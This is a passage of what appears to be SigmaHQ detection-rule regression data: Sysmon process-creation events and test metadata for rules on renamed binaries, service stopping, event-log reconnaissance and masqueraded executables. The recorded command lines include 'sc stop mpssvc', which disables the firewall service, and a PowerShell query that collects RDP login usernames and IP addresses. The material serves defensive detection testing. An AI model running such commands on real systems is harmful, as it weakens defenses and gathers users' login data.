\"MD5=28B5A3688253FD5822EE90BCAE2633F7,SHA256=7482890B1875BDCEC826F3385EAC7DCDC38F17358A13B1B8C790BDB895FF5054,IMPHASH=06F091DBEC9C3F0DD14808FFE59B95DE\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/info.yml",
    "content": "id: e9861f82-77a9-4f8b-a418-0fbb6019588b\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142\n      title: Potential Defense Evasion Via Binary Rename\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary/36480ae1-a1cb-4eaa-a0d6-29801d7e9142.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:28:22.116872Z\"\n        }\n      },\n      \"EventRecordID\": 256810,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:28:22.113\",\n      \"ProcessGuid\": \"5AB40FD1-3E66-68F9-2831-000000003B02\",\n      \"ProcessId\": 4832,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-wscript.exe\",\n      \"FileVersion\": \"5.812.10240.16384\",\n      \"Description\": \"Microsoft ® Windows Based Script Host\",\n      \"Product\": \"Microsoft ® Windows Script Host\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"wscript.exe\",\n      \"CommandLine\": \"renamed-wscript.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=BA3DDE938146C1C1A19D6762E0BF5311,SHA256=61891E70C5629397DD107066F520D1663C5136AB4366E0CB015EC1D047DFFC61,IMPHASH=EB3973026D64331DD575543A07621F9D\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/info.yml",
    "content": "id: 8fc87eda-5a7b-4080-93c6-5bf6145330c8\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\n      title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant/0ba1da6d-b6ce-4366-828c-18826c9de23e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:30:29.328671Z\"\n        }\n      },\n      \"EventRecordID\": 256840,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:30:29.319\",\n      \"ProcessGuid\": \"5AB40FD1-3EE5-68F9-3A31-000000003B02\",\n      \"ProcessId\": 480,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-curl.exe\",\n      \"FileVersion\": \"8.13.0\",\n      \"Description\": \"The curl executable\",\n      \"Product\": \"The curl executable\",\n      \"Company\": \"curl, https://curl.se/\",\n      \"OriginalFileName\": \"curl.exe\",\n      \"CommandLine\": \"renamed-curl.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/info.yml",
    "content": "id: a8016fa4-d7e0-40de-85b0-ae04f270eec5\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 7530cd3d-7671-43e3-b209-976966f6ea48\n      title: Renamed CURL.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/7530cd3d-7671-43e3-b209-976966f6ea48.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:25:23.218638Z\"\n        }\n      },\n      \"EventRecordID\": 256757,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:25:23.215\",\n      \"ProcessGuid\": \"5AB40FD1-3DB3-68F9-0A31-000000003B02\",\n      \"ProcessId\": 5312,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-ftp.exe\",\n      \"FileVersion\": \"10.0.20348.3451 (WinBuild.160101.0800)\",\n      \"Description\": \"File Transfer Program\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"ftp.exe\",\n      \"CommandLine\": \"renamed-ftp.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=02EF5C4F3C041DE47811498C331B6F46,SHA256=B551CF05B43639364EFC71995E19DB620F5EFCE311110D0CF932354C3FE6ED7A,IMPHASH=7B22256667E90FDEA4DBB956FD02584C\",\n      \"ParentProcessGuid\": \"5AB40FD1-8DEB-68F7-7E01-000000003B02\",\n      \"ParentProcessId\": 476,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/info.yml",
    "content": "id: 280664b2-b588-40f6-8b65-280523049740\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 277a4393-446c-449a-b0ed-7fdc7795244c\n      title: Renamed FTP.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/277a4393-446c-449a-b0ed-7fdc7795244c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:32:00.478719Z\"\n        }\n      },\n      \"EventRecordID\": 256855,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:32:00.468\",\n      \"ProcessGuid\": \"5AB40FD1-3F40-68F9-4431-000000003B02\",\n      \"ProcessId\": 2808,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\renamed-msdt.exe\",\n      \"FileVersion\": \"10.0.20348.2849 (WinBuild.160101.0800)\",\n      \"Description\": \"Diagnostics Troubleshooting Wizard\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"msdt.exe\",\n      \"CommandLine\": \"renamed-msdt.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=7C70F1DDC865BCFF963AD1CCFAA5E145,SHA256=377DD147174704790E2E981893E49FB72CE18133CF7E9E2EAA794ADF2F80D2DA,IMPHASH=9F0D1C67FCB6D4D5059556FF5E9A642B\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/info.yml",
    "content": "id: 0e26deb8-bbad-45fb-bb52-b5a2204ba626\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: bd1c6866-65fc-44b2-be51-5588fcff82b9\n      title: Renamed Msdt.EXE Execution\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:33:27.276702Z\"\n        }\n      },\n      \"EventRecordID\": 256875,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:33:27.274\",\n      \"ProcessGuid\": \"5AB40FD1-3F97-68F9-5631-000000003B02\",\n      \"ProcessId\": 3424,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\sc.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Service Control Manager Configuration Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"sc.exe\",\n      \"CommandLine\": \"sc  stop mpssvc\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-22T20:33:27.276702Z\"\n        }\n      },\n      \"EventRecordID\": 256875,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3168,\n          \"ThreadID\": 4580\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-1\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-22 20:33:27.274\",\n      \"ProcessGuid\": \"5AB40FD1-3F97-68F9-5631-000000003B02\",\n      \"ProcessId\": 3424,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\sc.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Service Control Manager Configuration Tool\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"sc.exe\",\n      \"CommandLine\": \"sc  stop mpssvc\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\Administrator\\\\Downloads\\\\testdata\\\\\",\n      \"User\": \"AR-WIN-1\\\\Administrator\",\n      \"LogonGuid\": \"5AB40FD1-8D74-68F7-E44B-100000000000\",\n      \"LogonId\": \"0x104be4\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD\",\n      \"ParentProcessGuid\": \"5AB40FD1-3E0C-68F9-1731-000000003B02\",\n      \"ParentProcessId\": 8252,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"AR-WIN-1\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/info.yml",
    "content": "id: 81ea361b-6e7b-417c-8f70-abd288b10c35\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1\n      title: Stop Windows Service Via Sc.EXE\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-03T07:42:38.210937Z\"\n        }\n      },\n      \"EventRecordID\": 26765,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3116,\n          \"ThreadID\": 1656\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-03 07:42:38.149\",\n      \"ProcessGuid\": \"0197231E-E9EE-692F-B004-000000000900\",\n      \"ProcessId\": 9720,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\n      \"FileVersion\": \"10.0.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows PowerShell\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"PowerShell.EXE\",\n      \"CommandLine\": \"powershell  -Command \\\"Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }}\\\"\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-BBFB-692F-3C8C-050000000000\",\n      \"LogonId\": \"0x58c3c\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=1736263E02468939F808C0528E8DBB7E,SHA256=1F9FFC2227F8DEA8B771D543C464CF8166C22A39420A5322B5892A640C4B34B6,IMPHASH=68A9FF9C8D0D4655E46E1A7A190A41D2\",\n      \"ParentProcessGuid\": \"0197231E-E967-692F-A904-000000000900\",\n      \"ParentProcessId\": 9076,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/info.yml",
    "content": "id: a31979d4-d358-47c1-b698-875ec379a3c1\ndescription: N/A\ndate: 2025-12-03\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf\n      title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon/beaa66d6-aa1b-4e3c-80f5-e0145369bfaf.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/e4a6b256-3e47-40fc-89d2-7a477edd6915.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2026-02-04T08:52:58.205267Z\"\n        }\n      },\n      \"EventRecordID\": 715573,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 776,\n          \"ThreadID\": 4344\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"srv-01.midgardnet.tech\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2026-02-04 08:52:58.203\",\n      \"ProcessGuid\": \"14207D89-08EA-6983-2A02-000000004402\",\n      \"ProcessId\": 5696,\n      \"Image\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\taskhost.exe\",\n      \"FileVersion\": \"10.0.20348.1 (WinBuild.160101.0800)\",\n      \"Description\": \"Windows Calculator\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"CALC.EXE\",\n      \"CommandLine\": \"taskhost.exe\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\SwachchhandaP\\\\Downloads\\\\\",\n      \"User\": \"MIDGARDNET\\\\SwachchhandaP\",\n      \"LogonGuid\": \"14207D89-057C-6983-A047-0C0000000000\",\n      \"LogonId\": \"0xc47a0\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=1FD4DD58C75D6F2EDCDB337EE686231E,SHA256=4208893C871D2499F184E3F0F2554DA89F451FA9E98D95FC9516C5AE8F2B3BBD,IMPHASH=8EEAA9499666119D13B3F44ECD77A729\",\n      \"ParentProcessGuid\": \"14207D89-08EA-6983-2902-000000004402\",\n      \"ParentProcessId\": 1816,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"cmd  /c taskhost.exe\",\n      \"ParentUser\": \"MIDGARDNET\\\\SwachchhandaP\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/info.yml",
    "content": "id: 0efa6f32-c1df-4053-91ca-cafc05416e79\ndescription: N/A\ndate: 2026-02-04\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: e4a6b256-3e47-40fc-89d2-7a477edd6915\n      title: System File Execution Location Anomaly\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/e4a6b256-3e47-40fc-89d2-7a477edd6915.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/be58d2e2-06c8-4f58-b666-b99f6dc3b6cd.json",
